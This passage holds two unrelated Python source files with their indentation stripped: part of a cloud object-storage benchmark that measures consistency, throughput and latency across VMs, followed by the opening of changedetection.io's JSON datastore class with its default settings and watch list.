result = json.loads(result_string[0])
for percentile in PERCENTILES_LIST:
results.append(sample.Sample(
('%s %s') % (sample_name, percentile),
8 * float(result[percentile]) / 1000 / 1000,
THROUGHPUT_UNIT,
metadata))
def ListConsistencyBenchmark(results, metadata, vm, command_builder,
service, bucket_name):
"""A benchmark for bucket list consistency.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vm: the VM to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: an ObjectStorageService.
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
list_consistency_cmd = command_builder.BuildCommand([
'--bucket=%s' % bucket_name,
'--iterations=%d' % FLAGS.object_storage_list_consistency_iterations,
'--scenario=ListConsistency'])
_, raw_result = vm.RemoteCommand(list_consistency_cmd)
logging.info('ListConsistency raw result is %s', raw_result)
for scenario in LIST_CONSISTENCY_SCENARIOS:
metric_name = '%s %s' % (scenario, LIST_CONSISTENCY_PERCENTAGE)
search_string = '%s: (.*)' % metric_name
result_string = re.findall(search_string, raw_result)
if not result_string:
raise ValueError(
'Cannot get percentage from ListConsistency test.')
results.append(sample.Sample(
metric_name,
(float)(result_string[0]),
NA_UNIT,
metadata))
# Parse the list inconsistency window if there is any.
metric_name = '%s %s' % (scenario, LIST_INCONSISTENCY_WINDOW)
search_string = '%s: (.*)' % metric_name
result_string = re.findall(search_string, raw_result)
_JsonStringToPercentileResults(results,
result_string[0],
metric_name,
LATENCY_UNIT,
metadata)
# Also report the list latency. These latencies are from the lists
# that were consistent.
metric_name = '%s %s' % (scenario, LIST_LATENCY)
search_string = '%s: (.*)' % metric_name
result_string = re.findall(search_string, raw_result)
_JsonStringToPercentileResults(results,
result_string[0],
metric_name,
LATENCY_UNIT,
metadata)
def LoadWorkerOutput(output):
"""Load output from worker processes to our internal format.
Args:
output: list of strings. The stdouts of all worker processes.
Returns:
A tuple of start_time, latency, size. Each of these is a list of
numpy arrays, one array per worker process. start_time[i],
latency[i], and size[i] together form a table giving the start
time, latency, and size (bytes transmitted or received) of all
send/receive operations for worker i.
start_time holds POSIX timestamps, stored as np.float64. latency
holds times in seconds, stored as np.float64. size holds sizes in
bytes, stored as np.int64.
Example:
start_time[i] latency[i] size[i]
------------- ---------- -------
0.0 0.5 100
1.0 0.7 200
2.3 0.3 100
Raises:
AssertionError, if an individual worker's input includes
overlapping operations, or operations that don't move forward in
time, or if the input list isn't in stream number order.
"""
start_times = []
latencies = []
sizes = []
for worker_out in output:
json_out = json.loads(worker_out)
for stream in json_out:
assert len(stream['start_times']) == len(stream['latencies'])
assert len(stream['latencies']) == len(stream['sizes'])
start_times.append(np.asarray(stream['start_times'], dtype=np.float64))
latencies.append(np.asarray(stream['latencies'], dtype=np.float64))
sizes.append(np.asarray(stream['sizes'], dtype=np.int64))
return start_times, latencies, sizes
def _RunMultiStreamProcesses(vms, command_builder, cmd_args, streams_per_vm):
"""Runs all of the multistream read or write processes and doesn't return
until they complete.
Args:
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
cmd_args: arguments for the command_builder.
streams_per_vm: number of threads per vm.
"""
output = [None] * len(vms)
def RunOneProcess(vm_idx):
logging.info('Running on VM %s.', vm_idx)
cmd = command_builder.BuildCommand(cmd_args + [
'--stream_num_start=%s' % (vm_idx * streams_per_vm),
'--vm_id=%s' % vm_idx
])
out, _ = vms[vm_idx].RobustRemoteCommand(cmd, should_log=False)
output[vm_idx] = out
# Each vm/process has a thread managing it.
threads = [
threading.Thread(target=RunOneProcess, args=(vm_idx,))
for vm_idx in range(len(vms))]
for thread in threads:
thread.start()
logging.info('Started %s processes.', len(vms))
# Wait for the threads to finish
for thread in threads:
thread.join()
logging.info('All processes complete.')
return output
def _DatetimeNow():
"""Returns datetime.datetime.now()."""
return datetime.datetime.now()
def _ColdObjectsWrittenFilename():
"""Generates a name for the objects_written_file.
Returns:
The name of the objects_written_file if it should be created, or None.
"""
if FLAGS.object_storage_objects_written_file_prefix:
# Note this format is required by _ColdObjectsWrittenFileAgeHours.
datetime_suffix = _DatetimeNow().strftime('%Y%m%d-%H%M')
return '%s-%s-%s-%s' % (
FLAGS.object_storage_objects_written_file_prefix,
FLAGS.object_storage_region,
uuid.uuid4(), # Add a UUID to support parallel runs that upload data.
datetime_suffix)
return None
def _ColdObjectsWrittenFileAgeHours(filename):
"""Determines the age in hours of an objects_written_file.
Args:
filename: The name of the file.
Returns:
The age of the file in hours (based on the name), or None.
"""
# Parse the year, month, day, hour, and minute from the filename based on the
# way it is written in _ColdObjectsWrittenFilename.
match = re.search(r'(\d\d\d\d)(\d\d)(\d\d)-(\d\d)(\d\d)$', filename)
if not match:
return None
year, month, day, hour, minute = (int(item) for item in match.groups())
write_datetime = datetime.datetime(year, month, day, hour, minute)
write_timedelta = _DatetimeNow() - write_datetime
return write_timedelta.total_seconds() / _SECONDS_PER_HOUR
def _MultiStreamOneWay(results, metadata, vms, command_builder,
service, bucket_name, operation):
"""Measures multi-stream latency and throughput in one direction.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: The provider's ObjectStorageService
bucket_name: the primary bucket to benchmark.
operation: 'upload' or 'download'
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
objects_written_file = posixpath.join(vm_util.VM_TMP_DIR,
OBJECTS_WRITTEN_FILE)
size_distribution = _DistributionToBackendFormat(
FLAGS.object_storage_object_sizes)
logging.info('Distribution %s, backend format %s.',
FLAGS.object_storage_object_sizes, size_distribution)
streams_per_vm = FLAGS.object_storage_streams_per_vm
num_vms = FLAGS.num_vms
start_time = (
time.time() +
MultiThreadStartDelay(num_vms, streams_per_vm).m_as('second'))
delete_delay = MultiThreadDeleteDelay(num_vms, streams_per_vm)
logging.info('Start time is %s', start_time)
logging.info('Delete delay is %s', delete_delay)
cmd_args = [
'--bucket=%s' % bucket_name,
'--objects_per_stream=%s' % (
FLAGS.object_storage_multistream_objects_per_stream),
'--num_streams=%s' % streams_per_vm,
'--start_time=%s' % start_time,
'--objects_written_file=%s' % objects_written_file]
if operation == MultistreamOperationType.upload:
cmd_args += [
'--object_sizes="%s"' % size_distribution,
'--object_naming_scheme=%s' % FLAGS.object_storage_object_naming_scheme,
'--scenario=MultiStreamWrite']
elif operation == MultistreamOperationType.download:
cmd_args += ['--scenario=MultiStreamRead']
elif operation == MultistreamOperationType.delete:
cmd_args += [
'--scenario=MultiStreamDelete',
'--delete_delay=%s' % delete_delay
]
elif operation == MultistreamOperationType.bulk_delete:
cmd_args += [
'--scenario=MultiStreamDelete', '--bulk_delete=true',
'--delete_delay=%s' % delete_delay
]
else:
raise Exception('Value of operation must be \'upload\' or \'download\'.'
'Value is: \'' + operation.name + '\'')
output = _RunMultiStreamProcesses(vms, command_builder, cmd_args,
streams_per_vm)
start_times, latencies, sizes = LoadWorkerOutput(output)
if FLAGS.object_storage_worker_output:
with open(FLAGS.object_storage_worker_output, 'w') as out_file:
out_file.write(json.dumps(output))
_ProcessMultiStreamResults(
start_times,
latencies,
sizes,
operation.name,
list(six.iterkeys(size_distribution)),
results,
metadata=metadata)
# Write the objects written file if the flag is set and this is an upload
objects_written_path_local = _ColdObjectsWrittenFilename()
if operation == MultistreamOperationType.upload and objects_written_path_local is not None:
# Get the objects written from all the VMs
# Note these are JSON lists with the following format:
# [[object1_name, object1_size],[object2_name, object2_size],...]
outs = vm_util.RunThreaded(
lambda vm: vm.RemoteCommand('cat ' + objects_written_file), vms)
maybe_storage_account = ''
maybe_resource_group = ''
if FLAGS.storage == 'Azure':
maybe_storage_account = '"azure_storage_account": "%s", ' % \
service.storage_account.name
maybe_resource_group = '"azure_resource_group": "%s", ' % \
service.resource_group.name
# Merge the objects written from all the VMs into a single string
objects_written_json = \
'{%s%s"bucket_name": "%s", "objects_written": %s}' % \
(maybe_storage_account, maybe_resource_group, bucket_name,
'[' + ','.join([out for out, _ in outs]) + ']')
# Write the file
with open(objects_written_path_local, 'w') as objects_written_file_local:
objects_written_file_local.write(objects_written_json)
def MultiStreamRWBenchmark(results, metadata, vms, command_builder,
service, bucket_name):
"""A benchmark for multi-stream read/write latency and throughput.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: The provider's ObjectStorageService
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
logging.info('Starting multi-stream write test on %s VMs.', len(vms))
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, MultistreamOperationType.upload)
logging.info('Finished multi-stream write test. Starting '
'multi-stream read test.')
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, MultistreamOperationType.download)
logging.info('Finished multi-stream read test.')
def MultiStreamWriteBenchmark(results, metadata, vms, command_builder,
service, bucket_name):
"""A benchmark for multi-stream write latency and throughput.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: The provider's ObjectStorageService
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
logging.info('Starting multi-stream write test on %s VMs.', len(vms))
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, MultistreamOperationType.upload)
logging.info('Finished multi-stream write test.')
def MultiStreamReadBenchmark(results, metadata, vms, command_builder,
service, bucket_name, read_objects):
"""A benchmark for multi-stream read latency and throughput.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: The provider's ObjectStorageService
bucket_name: the primary bucket to benchmark.
read_objects: List of lists of [object_name, object_size]. In the outermost
list, each element corresponds to a VM's worker process.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
logging.info('Starting multi-stream read test on %s VMs.', len(vms))
assert read_objects is not None, (
'api_multistream_reads scenario requires the '
'object_storage_read_objects_prefix flag to be set.')
# Send over the objects written file
try:
# Write the per-VM objects-written-files
assert len(read_objects) == len(vms), (
'object_storage_read_objects_prefix file specified requires exactly '
'%d VMs, but %d were provisioned.' % (len(read_objects), len(vms)))
for vm, vm_objects_written in zip(vms, read_objects):
# Note that each file is written with a unique name so that parallel runs
# don't overwrite the same local file. They are pushed to the VM to a file
# named OBJECTS_WRITTEN_FILE.
tmp_objects_written_path = os.path.join(vm_util.GetTempDir(),
'%s-%s' % (OBJECTS_WRITTEN_FILE,
vm.name))
with open(tmp_objects_written_path, 'w') as objects_written_file:
objects_written_file.write(json.dumps(vm_objects_written))
vm.PushFile(tmp_objects_written_path,
posixpath.join(vm_util.VM_TMP_DIR, OBJECTS_WRITTEN_FILE))
except Exception as e:
raise Exception('Failed to upload the objects written files to the VMs: '
'%s' % e)
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, MultistreamOperationType.download)
logging.info('Finished multi-stream read test.')
def MultiStreamDelete(results, metadata, vms, command_builder, service,
bucket_name):
"""A benchmark for multi-stream delete.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: The provider's ObjectStorageService
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
logging.info('Starting multi-stream delete test on %s VMs.', len(vms))
if FLAGS.object_storage_bulk_delete:
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, MultistreamOperationType.bulk_delete)
else:
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, MultistreamOperationType.delete)
logging.info('Finished multi-stream delete test.')
def CheckPrerequisites(benchmark_config):
"""Verifies that the required resources are present.
Args:
benchmark_config: Benchmark config to verify.
Raises:
perfkitbenchmarker.data.ResourceNotFound: On missing resource.
perfkitbenchmarker.errors.Setup.InvalidFlagConfigurationError: On invalid
flags.
"""
del benchmark_config
data.ResourcePath(DATA_FILE)
if FLAGS.object_storage_apply_region_suffix_to_bucket_name:
if not FLAGS.object_storage_region:
raise errors.Setup.InvalidFlagConfigurationError(
'Please specify --object_storage_region if using '
'--object_storage_apply_region_suffix_to_bucket_name.')
def _AppendPercentilesToResults(output_results, input_results, metric_name,
metric_unit, metadata):
# PercentileCalculator will (correctly) raise an exception on empty
# input, but an empty input list makes semantic sense here.
if len(input_results) == 0:
return
percentiles = PercentileCalculator(input_results)
for percentile in PERCENTILES_LIST:
output_results.append(sample.Sample(('%s %s') % (metric_name, percentile),
percentiles[percentile],
metric_unit,
metadata))
def CLIThroughputBenchmark(output_results, metadata, vm, command_builder,
service, bucket):
"""A benchmark for CLI tool throughput.
We will upload and download a set of files from/to a local directory
via cli tools and observe the throughput.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vm: the VM to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: an ObjectStorageService.
bucket_name: the primary bucket to benchmark.
Raises:
NotEnoughResultsError: if we failed too many times to upload or download.
"""
data_directory = '/tmp/run/data'
# The real solution to the iteration count issue is dynamically
# choosing the number of iterations based on how long they
# take. This will work for now, though.
if FLAGS.storage == providers.AZURE:
iteration_count = CLI_TEST_ITERATION_COUNT_AZURE
elif FLAGS.cli_test_size == 'normal':
iteration_count = CLI_TEST_ITERATION_COUNT
else:
iteration_count = LARGE_CLI_TEST_ITERATION_COUNT
# The CLI-based tests require some provisioning on the VM first.
vm.RemoteCommand(
'cd /tmp/run/; bash cloud-storage-workload.sh %s' % FLAGS.cli_test_size)
# CLI tool based tests.
cli_upload_results = []
cli_download_results = []
if FLAGS.cli_test_size == 'normal':
data_size_in_mbits = DATA_SIZE_IN_MBITS
file_names = ['file-%s.dat' % i for i in range(100)]
else:
data_size_in_mbits = LARGE_DATA_SIZE_IN_MBITS
file_names = ['file_large_3gib.dat']
for _ in range(iteration_count):
try:
service.EmptyBucket(bucket)
except Exception:
pass
try:
_, res = service.CLIUploadDirectory(vm, data_directory,
file_names, bucket)
except errors.VirtualMachine.RemoteCommandError:
logging.info('failed to upload, skip this iteration.')
continue
throughput = data_size_in_mbits / vm_util.ParseTimeCommandResult(res)
logging.info('cli upload throughput %f', throughput)
cli_upload_results.append(throughput)
try:
vm.RemoveFile(posixpath.join(DOWNLOAD_DIRECTORY, '*'))
except Exception:
pass
try:
_, res = service.CLIDownloadBucket(vm, bucket,
file_names, DOWNLOAD_DIRECTORY)
except errors.VirtualMachine.RemoteCommandError:
logging.info('failed to download, skip this iteration.')
continue
throughput = data_size_in_mbits / vm_util.ParseTimeCommandResult(res)
logging.info('cli download throughput %f', throughput)
cli_download_results.append(throughput)
expected_successes = iteration_count * (1 - CLI_TEST_FAILURE_TOLERANCE)
if (len(cli_download_results) < expected_successes or
len(cli_upload_results) < expected_successes):
raise NotEnoughResultsError('Failed to complete the required number of '
'iterations.')
# Report various percentiles.
metrics_prefix = ''
if FLAGS.cli_test_size != 'normal':
metrics_prefix = '%s ' % FLAGS.cli_test_size
_AppendPercentilesToResults(output_results,
cli_upload_results,
'%s%s' % (metrics_prefix,
UPLOAD_THROUGHPUT_VIA_CLI),
THROUGHPUT_UNIT,
metadata)
_AppendPercentilesToResults(output_results,
cli_download_results,
'%s%s' % (metrics_prefix,
DOWNLOAD_THROUGHPUT_VIA_CLI),
THROUGHPUT_UNIT,
metadata)
def PrepareVM(vm, service):
vm.InstallPackages('python3-pip')
# dependencies of API_TEST_SCRIPT
vm.RemoteCommand('sudo pip3 install absl-py')
vm.RemoteCommand('sudo pip3 install pyyaml')
vm.Install('openssl')
# Prepare data on vm, create a run directory in temporary directory, and add
# permission.
vm.RemoteCommand('sudo mkdir -p ' + SCRIPT_DIR)
vm.RemoteCommand('sudo chmod 777 ' + SCRIPT_DIR)
vm.RemoteCommand('sudo mkdir -p ' + DOWNLOAD_DIRECTORY)
vm.RemoteCommand('sudo chmod 777 ' + DOWNLOAD_DIRECTORY)
vm.RemoteCommand('sudo mkdir -p ' + REMOTE_PACKAGE_DIR)
vm.RemoteCommand('sudo chmod 777 ' + REMOTE_PACKAGE_DIR)
file_path = data.ResourcePath(DATA_FILE)
vm.PushFile(file_path, SCRIPT_DIR)
# push the test script
script_path = data.ResourcePath(
os.path.join(API_TEST_SCRIPTS_DIR, API_TEST_SCRIPT))
vm.PushFile(script_path, '/tmp/run/')
# push the package dependencies of the test script
for file_name in API_TEST_SCRIPT_PACKAGE_FILES + service.APIScriptFiles():
path = data.ResourcePath(
os.path.join(API_TEST_SCRIPTS_DIR, file_name))
logging.info('Uploading %s to %s', path, vm)
vm.PushFile(path, REMOTE_PACKAGE_DIR)
service.PrepareVM(vm)
def CleanupVM(vm, service):
service.CleanupVM(vm)
vm.RemoteCommand('/usr/bin/yes | sudo pip3 uninstall absl-py')
vm.RemoteCommand('sudo rm -rf /tmp/run/')
objects_written_file = posixpath.join(vm_util.VM_TMP_DIR,
OBJECTS_WRITTEN_FILE)
vm.RemoteCommand('rm -f %s' % objects_written_file)
def Prepare(benchmark_spec):
"""Prepare vm with cloud provider tool and prepare vm with data file.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
Raises:
ColdDataError: If this benchmark is reading cold data, but the data isn't
cold enough (as configured by object_storage_read_objects_min_hours).
"""
# We would like to always cleanup server side states when exception happens.
benchmark_spec.always_call_cleanup = True
# Load the objects to read file if specified
benchmark_spec.read_objects = None
if FLAGS.object_storage_read_objects_prefix is not None:
# By taking a glob, we choose an arbitrary file that is old enough, assuming
# there is ever more than one.
search_prefix = '%s-%s*' % (
FLAGS.object_storage_read_objects_prefix,
FLAGS.object_storage_region)
read_objects_filenames = glob.glob(search_prefix)
logging.info('Considering object files %s*: %s', search_prefix,
read_objects_filenames)
for filename in read_objects_filenames:
age_hours = _ColdObjectsWrittenFileAgeHours(filename)
if age_hours and age_hours > FLAGS.object_storage_read_objects_min_hours:
read_objects_filename = filename
break
else:
raise ColdDataError(
'Object data older than %d hours does not exist. Current cold data '
'files include the following: %s' % (
FLAGS.object_storage_read_objects_min_hours,
read_objects_filenames))
with open(read_objects_filename) as read_objects_file:
# Format of json structure is:
# {"bucket_name": <bucket_name>,
# ... any other provider-specific context needed
# "objects_written": <objects_written_array>}
benchmark_spec.read_objects = json.loads(read_objects_file.read())
benchmark_spec.read_objects_filename = read_objects_filename
benchmark_spec.read_objects_age_hours = age_hours
# When this benchmark reads these files, the data will be deleted. Delete
# the file that specifies the data too.
if not FLAGS.object_storage_dont_delete_bucket:
os.remove(read_objects_filename)
assert benchmark_spec.read_objects is not None, (
'Failed to read the file specified by '
'--object_storage_read_objects_prefix')
# Load the provider and its object storage service
providers.LoadProvider(FLAGS.storage)
# Determine the bucket name.
if benchmark_spec.read_objects is not None:
# Using an existing bucket
bucket_name = benchmark_spec.read_objects['bucket_name']
if FLAGS.object_storage_bucket_name is not None:
logging.warning('--object_storage_bucket_name ignored because '
'--object_storage_read_objects was specified')
else:
# Use a new bucket (or the name of a specified bucket).
bucket_name = FLAGS.object_storage_bucket_name or 'pkb%s' % FLAGS.run_uri
if FLAGS.object_storage_apply_region_suffix_to_bucket_name:
# Avoid non-alphanumeric characters in the region as bucket names on some
# clouds cannot contain non-alphanumeric characters.
bucket_name = '%s%s' % (bucket_name,
re.sub(r'[\W_]', '', FLAGS.object_storage_region))
service = object_storage_service.GetObjectStorageClass(FLAGS.storage)()
if (FLAGS.storage == 'Azure' and
FLAGS.object_storage_read_objects_prefix is not None):
# Storage provider is azure and we are reading existing objects.
# Need to prepare the ObjectStorageService with the existing storage
# account and resource group associated with the bucket containing our
# objects
service.PrepareService(
FLAGS.object_storage_region,
# On Azure, use an existing storage account if we
# are reading existing objects
(benchmark_spec.read_objects['azure_storage_account'],
benchmark_spec.read_objects['azure_resource_group']))
elif FLAGS.storage == 'Azure' and FLAGS.object_storage_bucket_name:
# We are using a bucket that may exist from a previous run. We should use
# a storage account and resource group for this bucket based on the same
# name (for consistency).
service.PrepareService(
FLAGS.object_storage_region,
# The storage account must not exceed 24 characters.
(bucket_name[:24], bucket_name + '-resource-group'),
try_to_create_storage_account_and_resource_group=True)
else:
service.PrepareService(FLAGS.object_storage_region)
vms = benchmark_spec.vms
vm_util.RunThreaded(lambda vm: PrepareVM(vm, service), vms)
# Make the bucket.
if benchmark_spec.read_objects is None:
# Fail if we cannot create the bucket as long as the bucket name was not
# set via a flag. If it was set by a flag, then we will still try to create
# the bucket, but won't fail if it was created. This supports running the
# benchmark on the same bucket multiple times.
raise_on_bucket_creation_failure = not FLAGS.object_storage_bucket_name
if FLAGS.storage == 'GCP' and FLAGS.object_storage_gcs_multiregion:
# Use a GCS multiregional bucket
multiregional_service = gcs.GoogleCloudStorageService()
multiregional_service.PrepareService(FLAGS.object_storage_gcs_multiregion
or DEFAULT_GCS_MULTIREGION)
multiregional_service.MakeBucket(
bucket_name, raise_on_failure=raise_on_bucket_creation_failure)
else:
# Use a regular bucket
service.MakeBucket(
bucket_name, raise_on_failure=raise_on_bucket_creation_failure)
# Save the service and the bucket name for later
benchmark_spec.service = service
benchmark_spec.bucket_name = bucket_name
def Run(benchmark_spec):
"""Run storage benchmark and publish results.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
Returns:
Total throughput in the form of tuple. The tuple contains
the sample metric (string), value (float), unit (string).
"""
logging.info('Start benchmarking object storage service, '
'scenario is %s, storage provider is %s.',
FLAGS.object_storage_scenario, FLAGS.storage)
service = benchmark_spec.service
bucket_name = benchmark_spec.bucket_name
metadata = {'storage_provider': FLAGS.storage}
vms = benchmark_spec.vms
if FLAGS[OBJECT_STORAGE_REGION].present:
metadata[REGIONAL_BUCKET_LOCATION] = FLAGS.object_storage_region
else:
metadata[REGIONAL_BUCKET_LOCATION] = DEFAULT
if FLAGS[OBJECT_STORAGE_GCS_MULTIREGION].present:
metadata[GCS_MULTIREGION_LOCATION] = FLAGS.object_storage_gcs_multiregion
else:
metadata[GCS_MULTIREGION_LOCATION] = DEFAULT
metadata.update(service.Metadata(vms[0]))
results = []
test_script_path = '/tmp/run/%s' % API_TEST_SCRIPT
try:
command_builder = APIScriptCommandBuilder(
test_script_path, STORAGE_TO_API_SCRIPT_DICT[FLAGS.storage], service)
except KeyError:
command_builder = UnsupportedProviderCommandBuilder(FLAGS.storage)
for name, benchmark in [('cli', CLIThroughputBenchmark),
('api_data', OneByteRWBenchmark),
('api_data', SingleStreamThroughputBenchmark),
('api_namespace', ListConsistencyBenchmark)]:
if FLAGS.object_storage_scenario in {name, 'all'}:
benchmark(results, metadata, vms[0], command_builder,
service, bucket_name)
# MultiStreamRW and MultiStreamWrite support multiple VMs, so they have a
# slightly different calling convention than the others.
for name, benchmark in [('api_multistream', MultiStreamRWBenchmark),
('api_multistream_writes',
MultiStreamWriteBenchmark)]:
if FLAGS.object_storage_scenario in {name, 'all'}:
benchmark(results, metadata, vms, command_builder, service, bucket_name)
# MultiStreamRead has the additional 'read_objects' parameter
if FLAGS.object_storage_scenario in {'api_multistream_reads', 'all'}:
metadata['cold_objects_filename'] = benchmark_spec.read_objects_filename
metadata['cold_objects_age_hours'] = benchmark_spec.read_objects_age_hours
MultiStreamReadBenchmark(results, metadata, vms, command_builder, service,
bucket_name,
benchmark_spec.read_objects['objects_written'])
# Clear the bucket if we're not saving the objects for later
# This is needed for long running tests, or else the objects would just pile
# up after each run.
keep_bucket = (FLAGS.object_storage_objects_written_file_prefix is not None or
FLAGS.object_storage_dont_delete_bucket)
if not keep_bucket:
MultiStreamDelete(results, metadata, vms, command_builder, service,
bucket_name)
service.UpdateSampleMetadata(results)
return results
def Cleanup(benchmark_spec):
"""Clean up storage bucket/container and clean up vm.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
"""
if not hasattr(benchmark_spec, 'service'):
logging.info('Skipping cleanup as prepare method failed')
return
service = benchmark_spec.service
bucket_name = benchmark_spec.bucket_name
vms = benchmark_spec.vms
vm_util.RunThreaded(lambda vm: CleanupVM(vm, service), vms)
# Only clean up bucket if we're not saving the objects for a later run
keep_bucket = (FLAGS.object_storage_objects_written_file_prefix is not None or
FLAGS.object_storage_dont_delete_bucket)
if not keep_bucket:
service.DeleteBucket(bucket_name)
service.CleanupService()
|
store.py
|
from os import unlink, path, mkdir
import json
import uuid as uuid_builder
from threading import Lock
from copy import deepcopy
import logging
import time
import threading
import os
from changedetectionio.notification import default_notification_format, default_notification_body, default_notification_title
# Is there an existing library to ensure some data store (JSON etc) is in sync with CRUD methods?
# Open a github issue if you know something :)
# https://stackoverflow.com/questions/6190468/how-to-trigger-function-on-value-change
class ChangeDetectionStore:
lock = Lock()
def __init__(self, datastore_path="/datastore", include_default_watches=True, version_tag="0.0.0"):
# Should only be active for docker
# logging.basicConfig(filename='/dev/stdout', level=logging.INFO)
self.needs_write = False
self.datastore_path = datastore_path
self.json_store_path = "{}/url-watches.json".format(self.datastore_path)
self.stop_thread = False
self.__data = {
'note': "Hello! If you change this file manually, please be sure to restart your changedetection.io instance!",
'watching': {},
'settings': {
'headers': {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Encoding': 'gzip, deflate', # No support for brolti in python requests yet.
'Accept-Language': 'en-GB,en-US;q=0.9,en;'
},
'requests': {
'timeout': 15, # Default 15 seconds
'minutes_between_check': 3 * 60, # Default 3 hours
'workers': 10 # Number of threads, lower is better for slow connections
},
'application': {
'password': False,
'base_url' : None,
'extract_title_as_title': False,
'fetch_backend': 'html_requests',
'notification_urls': [], # Apprise URL list
# Custom notification content
'notification_title': None,
'notification_body': None,
'notification_format': None
}
}
}
# Base definition for all watchers
self.generic_definition = {
'url': None,
'tag': None,
'last_checked': 0,
'last_changed': 0,
'paused': False,
'last_viewed': 0, # history key value of the last viewed via the [diff] link
'newest_history_key': "",
'title': None,
# Re #110, so then if this is set to None, we know to use the default value instead
# Requires setting to None on submit if it's the same as the default
'minutes_between_check': None,
'previous_md5': "",
'uuid': str(uuid_builder.uuid4()),
'headers': {}, # Extra headers to send
'body': None,
'method': 'GET',
'history': {}, # Dict of timestamp and output stripped filename
'ignore_text': [], # List of text to ignore when calculating the comparison checksum
# Custom notification content
'notification_urls': [], # List of URLs to add to the notification Queue (Usually AppRise)
'notification_title': None,
'notification_body': None,
'notification_format': None,
'css_filter': "",
'trigger_text': [], # List of text or regex to wait for until a change is detected
'fetch_backend': None,
'extract_title_as_title': False
}
if path.isfile('changedetectionio/source.txt'):
with open('changedetectionio/source.txt') as f:
# Should be set in Dockerfile to look for /source.txt , this will give us the git commit #
# So when someone gives us a backup file to examine, we know exactly what code they were running.
self.__data['build_sha'] = f.read()
try:
# @todo retest with ", encoding='utf-8'"
with open(self.json_store_path) as json_file:
from_disk = json.load(json_file)
# @todo isnt there a way todo this dict.update recursively?
# Problem here is if the one on the disk is missing a sub-struct, it wont be present anymore.
if 'watching' in from_disk:
self.__data['watching'].update(from_disk['watching'])
if 'app_guid' in from_disk:
self.__data['app_guid'] = from_disk['app_guid']
if 'settings' in from_disk:
if 'headers' in from_disk['settings']:
self.__data['settings']['headers'].update(from_disk['settings']['headers'])
if 'requests' in from_disk['settings']:
self.__data['settings']['requests'].update(from_disk['settings']['requests'])
if 'application' in from_disk['settings']:
self.__data['settings']['application'].update(from_disk['settings']['application'])
# Reinitialise each `watching` with our generic_definition in the case that we add a new var in the future.
# @todo pretty sure theres a python we todo this with an abstracted(?) object!
for uuid, watch in self.__data['watching'].items():
_blank = deepcopy(self.generic_definition)
_blank.update(watch)
self.__data['watching'].update({uuid: _blank})
self.__data['watching'][uuid]['newest_history_key'] = self.get_newest_history_key(uuid)
print("Watching:", uuid, self.__data['watching'][uuid]['url'])
# First time ran, doesnt exist.
except (FileNotFoundError, json.decoder.JSONDecodeError):
if include_default_watches:
print("Creating JSON store at", self.datastore_path)
self.add_watch(url='https://www.uk.emb-japan.go.jp/itpr_en/visa-cert-top.html', tag='UK')
self.add_watch(url='https://www.fr.emb-japan.go.jp/itpr_fr/visas-demarches.html', tag='Paris')
self.add_watch(url='https://www.fr.emb-japan.go.jp/itpr_fr/restrictionsdentree2021.html', tag='Paris')
self.add_watch(url='https://www.lyon.fr.emb-japan.go.jp/itpr_fr/info_visa.html', tag='Lyon')
self.__data['version_tag'] = version_tag
# Helper to remove password protection
password_reset_lockfile = "{}/removepassword.lock".format(self.datastore_path)
if path.isfile(password_reset_lockfile):
self.__data['settings']['application']['password'] = False
unlink(password_reset_lockfile)
if not 'app_guid' in self.__data:
import sys
import os
if "pytest" in sys.modules or "PYTEST_CURRENT_TEST" in os.environ:
self.__data['app_guid'] = "test-" + str(uuid_builder.uuid4())
else:
self.__data['app_guid'] = str(uuid_builder.uuid4())
# Generate the URL access token for RSS feeds
if not 'rss_access_token' in self.__data['settings']['application']:
import secrets
secret = secrets.token_hex(16)
self.__data['settings']['application']['rss_access_token'] = secret
self.needs_write = True
# Finally start the thread that will manage periodic data saves to JSON
save_data_thread = threading.Thread(target=self.save_datastore).start()
# Returns the newest key, but if theres only 1 record, then it's counted as not being new, so return 0.
def get_newest_history_key(self, uuid):
if len(self.__data['watching'][uuid]['history']) == 1:
return 0
dates = list(self.__data['watching'][uuid]['history'].keys())
# Convert to int, sort and back to str again
# @todo replace datastore getter that does this automatically
dates = [int(i) for i in dates]
dates.sort(reverse=True)
if len(dates):
# always keyed as str
return str(dates[0])
return 0
